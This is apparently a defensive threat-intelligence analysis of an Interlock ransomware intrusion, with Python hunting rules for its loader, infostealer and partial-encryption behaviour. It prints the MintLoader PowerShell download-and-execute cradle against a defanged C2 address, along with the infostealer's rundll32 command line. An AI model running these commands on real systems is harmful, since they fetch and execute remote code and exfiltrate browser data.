An in-depth analysis of an Interlock ransomware intrusion, detailing new malware tooling, defense evasion techniques, and high-ROI detection strategies.
Analysis Summary
# Tool/Technique: Interlock Ransomware Core Components
## Overview
The Interlock ransomware group runs its own ransomware operation, developing and deploying its own malware rather than using a Ransomware-as-a-Service (RaaS) model. This analysis covers the intrusion lifecycle: initial access, defense evasion tooling, and the deployment of the final ransomware payload and its encryption method.
## Technical Details
- Type: Malware Family (Ransomware)
- Platform: Primarily Windows (inferred from tooling like PowerShell, DLL execution via `rundll32.exe`)
- Capabilities: Initial access execution, defense evasion (process killing), data exfiltration (via custom infostealer), strong file encryption techniques.
- First Seen: Early stages correlate with a campaign reported in July (the year is not stated in the context, but the intrusion analysis describes 2025 activity).
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on described activities.*
- TA0001 - Initial Access
- T1189 - Drive-by Compromise (Potentially via initial loader)
- TA0005 - Defense Evasion
- T1212 - Exploitation for Defense Evasion (Use of anti-cheat driver vulnerability)
- T1055 - Process Injection (Inferred from DLL loading/overwriting)
- TA0008 - Lateral Movement
- T1021 - Remote Services (Inferred by GUI access for deployment)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (Via custom infostealer)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (Inferred from initial C2 connection)
## Functionality
### Core Capabilities
- **Initial Execution:** Leverages MintLoader infection resulting in PowerShell execution to fetch and run subsequent stages.
- **File Encryption:** Uses a hybrid encryption scheme: generates a symmetric AES key for file encryption, and then encrypts that AES key using a hardcoded RSA public key (asymmetric encryption).
- **Encryption Speed Optimization:** Implements partial file encryption logic, encrypting a block of data and then skipping a block (with a growing skip amount) to speed up the process on larger files.
### Advanced Features
- **Zero-Day Process Killing:** Utilizes a novel process-killing tool that exploits a zero-day vulnerability in a **gaming anti-cheat driver** specifically to disable EDR and AV tools.
- **Custom Infostealer ('move.dll'):** A dedicated infostealer that collects sensitive data from popular web browsers. It loads its real payload dynamically by reading another DLL and overwriting its own in-memory code with it.
- **Masquerading/Persistence:** Drops ransomware executables alongside a legitimate copy of `javaw.exe` into folders masquerading as legitimate applications (e.g., 'FortiClient', 'VMware', 'Welcome') within the `%AppData%\Roaming` directory.
## Indicators of Compromise
- File Hashes: [Not provided in context]
- File Names: `move.dll`, `javaw.exe` (dropped legitimate copy), Ransomware executable.
- Registry Keys: [Not provided in context]
- Network Indicators: `138[.]199[.]156[.]22:8080` (Initial C2/payload delivery).
- Behavioral Indicators: PowerShell command initiating remote execution via `iex $(irm ...)` using obfuscated time synchronization calculations for payload retrieval. Custom infostealer execution via `rundll32.exe move.dll start -k key.der -h <remote_host>`.
## Associated Threat Actors
- Interlock Ransomware Group (Operates self-developed malware, non-RaaS model).
- Correlated with indicators reported by eSentire and Mandiant (related to previous Interlock activity/malware like 'Cornflake v3' backdoor).
## Detection Methods
- **Behavioral Detection (Process Killing):** Monitoring for the execution of the custom process-killing tool that leverages the gaming anti-cheat driver vulnerability to terminate security products.
- **Behavioral Detection (Ransomware):** Monitoring for file handle operations that show alternating encryption/skipping patterns on large files, indicating partial encryption logic.
- **Signature-based Detection:** Detection on the initial obfuscated PowerShell command string fetching content from `138[.]199[.]156[.]22:8080`.
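The three process-level indicators above (the `rundll32.exe move.dll start -k ... -h ...` infostealer invocation, executables dropped into masquerading folders under `%AppData%\Roaming`, and the `iex $(irm ...)` PowerShell cradle) can be expressed as rules over process-creation telemetry. The following is an added example, not code from the report or from Interlock's tooling; the event format, the rule names and the sample events (including the `alice` user path and the `203.0.113.10` host) are constructed for illustration, and only the C2 address comes from the report.

```python
import re
from typing import Dict, List

# The report lists the C2 in defanged form; refang it once for matching.
KNOWN_C2 = "138[.]199[.]156[.]22:8080".replace("[.]", ".")

# Constructed sample process-creation events (hypothetical; shapes mirror the
# indicators in the text). Fields: image path and full command line.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\move.dll start -k key.der -h 203.0.113.10"},
    {"image": r"C:\Users\alice\AppData\Roaming\FortiClient\javaw.exe",
     "cmdline": r'"C:\Users\alice\AppData\Roaming\FortiClient\javaw.exe" -jar update.jar'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w h -c "iex $(irm ' + KNOWN_C2 + '/$($z = [datetime]::UtcNow))"'},
    {"image": r"C:\Program Files\Java\bin\javaw.exe",
     "cmdline": r'"C:\Program Files\Java\bin\javaw.exe" -jar app.jar'},
]

# Rule name -> regex applied to "<image> <cmdline>" (case-insensitive).
RULES = {
    # rundll32 loading a DLL with the infostealer's argument shape:
    # <export> -k <key file> -h <remote host>
    "interlock_infostealer_rundll32": re.compile(
        r"rundll32(?:\.exe)?\s+\S+\.dll\s+\w+\s+-k\s+\S+\s+-h\s+\S+", re.I),
    # any .exe living directly in one of the masquerading folder names the
    # report lists under %AppData%\Roaming
    "masquerade_dir_under_appdata": re.compile(
        r"\\AppData\\Roaming\\(?:FortiClient|VMware|Welcome)\\[^\\\s]+\.exe", re.I),
    # download-and-execute cradle: Invoke-Expression over Invoke-RestMethod
    "powershell_iex_irm_cradle": re.compile(r"\biex\s+\$\(\s*irm\b", re.I),
}


def match_event(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires on one process-creation event."""
    haystack = event["image"] + " " + event["cmdline"]
    hits = [name for name, rx in RULES.items() if rx.search(haystack)]
    # Exact-string match on the known C2 is kept separate from the behavioral
    # rules so the generic rules still fire if the infrastructure changes.
    if KNOWN_C2 in event["cmdline"]:
        hits.append("known_c2_in_cmdline")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> fired rules, keeping only events with at least one hit."""
    result = {}
    for idx, event in enumerate(events):
        hits = match_event(event)
        if hits:
            result[idx] = hits
    return result


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], "->", hits)
```

The legitimate `javaw.exe` under `Program Files` is deliberately included to show that the masquerade rule keys on the folder location, not on the binary name: a signed Java runtime is only suspicious here because of where it was dropped.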
## Mitigation Strategies
- Deploy multi-layered security, including a robust EDR solution on every endpoint (the initial victim's machine had no EDR).
- Thoroughly vet and restrict execution of unsigned scripts via PowerShell logging and Constrained Language Mode enforcement.
- Keep security tooling and drivers up to date, including third-party drivers such as gaming anti-cheat drivers, since vulnerable drivers are exploited for defense evasion.
## Related Tools/Techniques
- MintLoader (Used for initial access/loader).
- Previous Interlock malware artifacts (e.g., Cornflake v3 backdoor, referenced by Mandiant).
***
# Tool/Technique: MintLoader
## Overview
MintLoader is the infection vector that led to initial access in the reported Interlock intrusion. It uses PowerShell to download and execute the next stage of the attack.
## Technical Details
- Type: Malware Family (Loader/Dropper)
- Platform: Windows
- Capabilities: Initial execution, retrieval and execution of secondary payloads via obfuscated PowerShell commands.
- First Seen: [Not provided in context]
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566.001 - Phishing: Spearphishing Attachment (Inferred mechanism for delivering initial payload that leads to MintLoader execution).
## Functionality
### Core Capabilities
- **Initial Compromise:** Infects an end user's laptop, initiating the attack chain.
- **PowerShell Staging:** Executes a highly obfuscated PowerShell command to retrieve and execute a secondary payload from a remote server.
### Advanced Features
- **Time-Based Obfuscation:** The PowerShell command derives the request path at run time: it computes the seconds elapsed between the current UTC time and the start of the Unix epoch (1 January 1970), floors the value, and rounds it down to a multiple of 16. The result is used as the path requested from the C2 server, so the URL changes every 16 seconds and a static URL signature will not match it.
## Indicators of Compromise
- File Hashes: [Not provided in context]
- File Names: [Not provided in context]
- Registry Keys: [Not provided in context]
- Network Indicators: `138[.]199[.]156[.]22:8080` (C2 destination for the initial PowerShell script execution).
- Behavioral Indicators: Execution of the specific dynamic PowerShell command: `powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime] :: UtcNow; $y = ([datetime]( '01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"`
## Associated Threat Actors
- Used by the Interlock Ransomware Group in this observed intrusion.
## Detection Methods
- **Signature/String Detection:** Detection for the specific, complex PowerShell invocation string shown in the IOCs.
- **Behavioral Detection:** Monitoring for remote execution via PowerShell combined with `irm` (Invoke-RestMethod) to download and execute arbitrary code.
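Because the cradle's request path is the current Unix time rounded down to a multiple of 16, a defender can reproduce that arithmetic and hunt proxy logs for it: a request whose last path segment is an integer, divisible by 16, and within a few seconds of the log line's own timestamp is the signature of this staging mechanism, whichever host it goes to. The following is an added example, not code from the report or from MintLoader; the proxy log format, the `staging_path_value` and `hunt` names, the tolerance window and the sample log lines (with the `203.0.113.77` host and the 2025-07-14 timestamps) are constructed assumptions, and only the C2 address comes from the report.

```python
import math
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
KNOWN_C2 = "138[.]199[.]156[.]22:8080".replace("[.]", ".")  # refanged from the report

# Constructed proxy log lines (hypothetical format): "<ISO8601 UTC> <src> <method> <url>"
SAMPLE_PROXY_LOG = [
    "2025-07-14T10:22:41Z 10.0.0.5 GET http://138.199.156.22:8080/1752488560",
    "2025-07-14T10:22:41Z 10.0.0.5 GET http://www.example.com/index.html",
    "2025-07-14T10:24:10Z 10.0.0.9 GET http://203.0.113.77:8080/1752488640",
    "2025-07-14T10:25:00Z 10.0.0.9 GET http://cdn.example.net/v2/20250714",
]

LOG_RX = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def staging_path_value(now: datetime) -> int:
    """Reproduce the cradle's arithmetic: floor(seconds since epoch), rounded down to a multiple of 16.

    This mirrors $w = [math]::Floor($x); $v = $w - ($w % 16) from the observed command.
    """
    w = math.floor((now - EPOCH).total_seconds())
    return w - (w % 16)


def parse_line(line: str) -> Optional[Tuple[datetime, str, str]]:
    """Split one constructed log line into (timestamp, source, url); None if malformed."""
    m = LOG_RX.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["url"]


def split_url(url: str) -> Tuple[str, str]:
    """Return (host[:port], path) without any URL library, good enough for log hunting."""
    host_and_path = url.split("://", 1)[-1]
    host, _, path = host_and_path.partition("/")
    return host, path


def looks_like_time_bucket(url: str, observed_at: datetime, tolerance_s: int = 120) -> bool:
    """True if the last path segment is a 16-second epoch bucket close to the request time."""
    _, path = split_url(url)
    last = path.rsplit("/", 1)[-1]
    if not last.isdigit():
        return False
    value = int(last)
    if value % 16:
        return False
    # Allow for clock skew between the endpoint and the proxy.
    return abs(value - staging_path_value(observed_at)) <= tolerance_s


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per suspicious request, with the reasons it was flagged."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, url = parsed
        host, _ = split_url(url)
        reasons = []
        if host == KNOWN_C2:
            reasons.append("known_c2_host")
        if looks_like_time_bucket(url, ts):
            reasons.append("16s_epoch_bucket_path")
        if reasons:
            hits.append({"ts": ts.isoformat(), "src": src, "url": url, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_PROXY_LOG):
        print(hit)
```

The third sample line is flagged even though its host is not the known C2: the time-bucket check generalizes the indicator from one IP address to the staging technique itself, which is the part an operator cannot change without rewriting the loader.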
## Mitigation Strategies
- Disable or restrict PowerShell usage for regular users.
- Implement PowerShell logging (Module, Script Block, Transcription logging) to capture the full decoded commands.
- Utilize application control to prevent unauthorized execution flows originating from user-level processes.
## Related Tools/Techniques
- Interlock Ransomware (Downstream payload).
***
# Tool/Technique: Custom Ransomware Encryption Logic
## Overview
The ransomware's file encryption routine utilizes a hybrid approach involving AES (symmetric) for bulk encryption and RSA (asymmetric) to protect the AES key, incorporating a specific optimization technique to speed up the locking process.
## Technical Details
- Type: Technique/Module (Ransomware Encryption Core)
- Platform: Windows
- Capabilities: Secure encryption of targeted files using AES, key protection using RSA, and process optimization via block skipping.
- First Seen: During the final payload deployment phase of the Interlock intrusion.
## MITRE ATT&CK Mapping
- TA0040 - Impact
- T1486 - Data Encrypted for Impact (covers the key-wrapping step as well: the file-specific symmetric key is itself encrypted with the hardcoded RSA public key; T1486 has no sub-techniques).
## Functionality
### Core Capabilities
- **Symmetric Encryption:** Generates a unique AES key for each file targeted for encryption.
- **Asymmetric Key Protection:** Encrypts the file-specific AES key using a hardcoded RSA public key (encrypt-only mode).
- **Key Appending:** The encrypted AES key is appended to the encrypted file content.
### Advanced Features
- **Partial Encryption/Skip Block:** The `cryptBlocksByAES` function loops over the file: it writes an encrypted block of data, then calls `hedle.seek` to move the file pointer forward, leaving a large chunk of the original file unencrypted. The file as a whole is still unusable, but far fewer bytes are processed, which speeds up encryption of large files. The skip amount (`tsk`) also grows as the loop progresses.
## Indicators of Compromise
- File Hashes: [Not provided in context]
- File Names: Encrypted files would likely have a distinct ransom extension applied (not specified).
- Registry Keys: [Not provided in context]
- Network Indicators: [Not applicable]
- Behavioral Indicators: File I/O operations characteristic of writing encrypted data followed by uncharacteristic file pointer jumps (skips) within the same file writing session.
## Associated Threat Actors
- Interlock Ransomware Group
## Detection Methods
- **File Content Analysis:** Scanning for files exhibiting file headers/metadata inconsistent with standard file types following the known encryption block/skip pattern.
- **YARA rules:** Creating rules targeting specific byte sequences associated with the ransomware header or the pattern of the hardcoded RSA key structure within the dropped files.
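The behavioral indicator given here and in the core-components section (encrypted writes alternating with forward file-pointer jumps, with the skip growing over the course of one handle's lifetime) can be checked directly against a file-I/O trace. The following is an added example, not code from the report or from the ransomware; it reconstructs per-handle write/seek sequences and flags handles whose post-write forward skips repeat and grow. The trace format, the `find_intermittent_encryption` name, the minimum cycle count and the sample trace (handles `h1`, `h2`, `h3`) are constructed assumptions.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed file-I/O trace (hypothetical). Each event is (handle, op, value):
#   WRITE value = bytes written at the handle's current position
#   SEEK  value = new absolute file offset (what SetFilePointer/seek would set)
Event = Tuple[str, str, int]
MiB = 1_048_576
SAMPLE_TRACE: List[Event] = [
    # h1: write 1 MiB, skip 2 MiB, write, skip 4 MiB, write, skip 8 MiB, write
    ("h1", "WRITE", MiB), ("h1", "SEEK", 3 * MiB), ("h1", "WRITE", MiB),
    ("h1", "SEEK", 8 * MiB), ("h1", "WRITE", MiB), ("h1", "SEEK", 17 * MiB),
    ("h1", "WRITE", MiB),
    # h2: ordinary sequential write, no seeks
    ("h2", "WRITE", 65_536), ("h2", "WRITE", 65_536), ("h2", "WRITE", 65_536),
    # h3: random-access pattern (e.g. a database file): one forward jump, one backward
    ("h3", "WRITE", 4096), ("h3", "SEEK", 65_536), ("h3", "WRITE", 4096),
    ("h3", "SEEK", 8192), ("h3", "WRITE", 4096),
]


def skip_profile(events: List[Event]) -> Tuple[Dict[str, List[int]], Dict[str, int]]:
    """Replay the trace per handle, recording forward jumps that immediately follow a write."""
    pos: Dict[str, int] = defaultdict(int)       # current offset per handle
    skips: Dict[str, List[int]] = defaultdict(list)
    written: Dict[str, int] = defaultdict(int)
    last_op: Dict[str, str] = {}
    for handle, op, value in events:
        if op == "WRITE":
            pos[handle] += value
            written[handle] += value
        elif op == "SEEK":
            # Only a forward seek right after a write is a "skip" in the sense of the
            # block/skip loop; backward seeks and seeks after reads are ignored.
            if last_op.get(handle) == "WRITE" and value > pos[handle]:
                skips[handle].append(value - pos[handle])
            pos[handle] = value
        last_op[handle] = op
    return skips, written


def find_intermittent_encryption(events: List[Event], min_cycles: int = 3) -> Dict[str, Dict[str, object]]:
    """Flag handles with at least min_cycles write->forward-skip cycles whose skips never shrink and do grow."""
    skips, written = skip_profile(events)
    flagged: Dict[str, Dict[str, object]] = {}
    for handle, jumps in skips.items():
        if len(jumps) < min_cycles:
            continue
        non_decreasing = all(b >= a for a, b in zip(jumps, jumps[1:]))
        grows = jumps[-1] > jumps[0]
        if non_decreasing and grows:
            flagged[handle] = {
                "skips": jumps,
                "bytes_written": written[handle],
                "bytes_skipped": sum(jumps),
            }
    return flagged


if __name__ == "__main__":
    for handle, info in find_intermittent_encryption(SAMPLE_TRACE).items():
        print(handle, info)
```

Requiring several cycles and a growing skip is what separates this pattern from legitimate sparse or random-access writers such as databases and virtual disk images, which seek in both directions and with no monotonic trend; the `min_cycles` threshold is a tuning knob rather than a fixed property of the malware.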
## Mitigation Strategies
- Robust, regularly tested backup strategy (3-2-1 rule).
- Monitor for rapid, widespread file modification events across network shares or critical servers.
- Deploy Endpoint Detection and Response (EDR) capable of heuristic analysis on file system activity.
## Related Tools/Techniques
- Standard hybrid encryption schemes common among modern ransomware strains.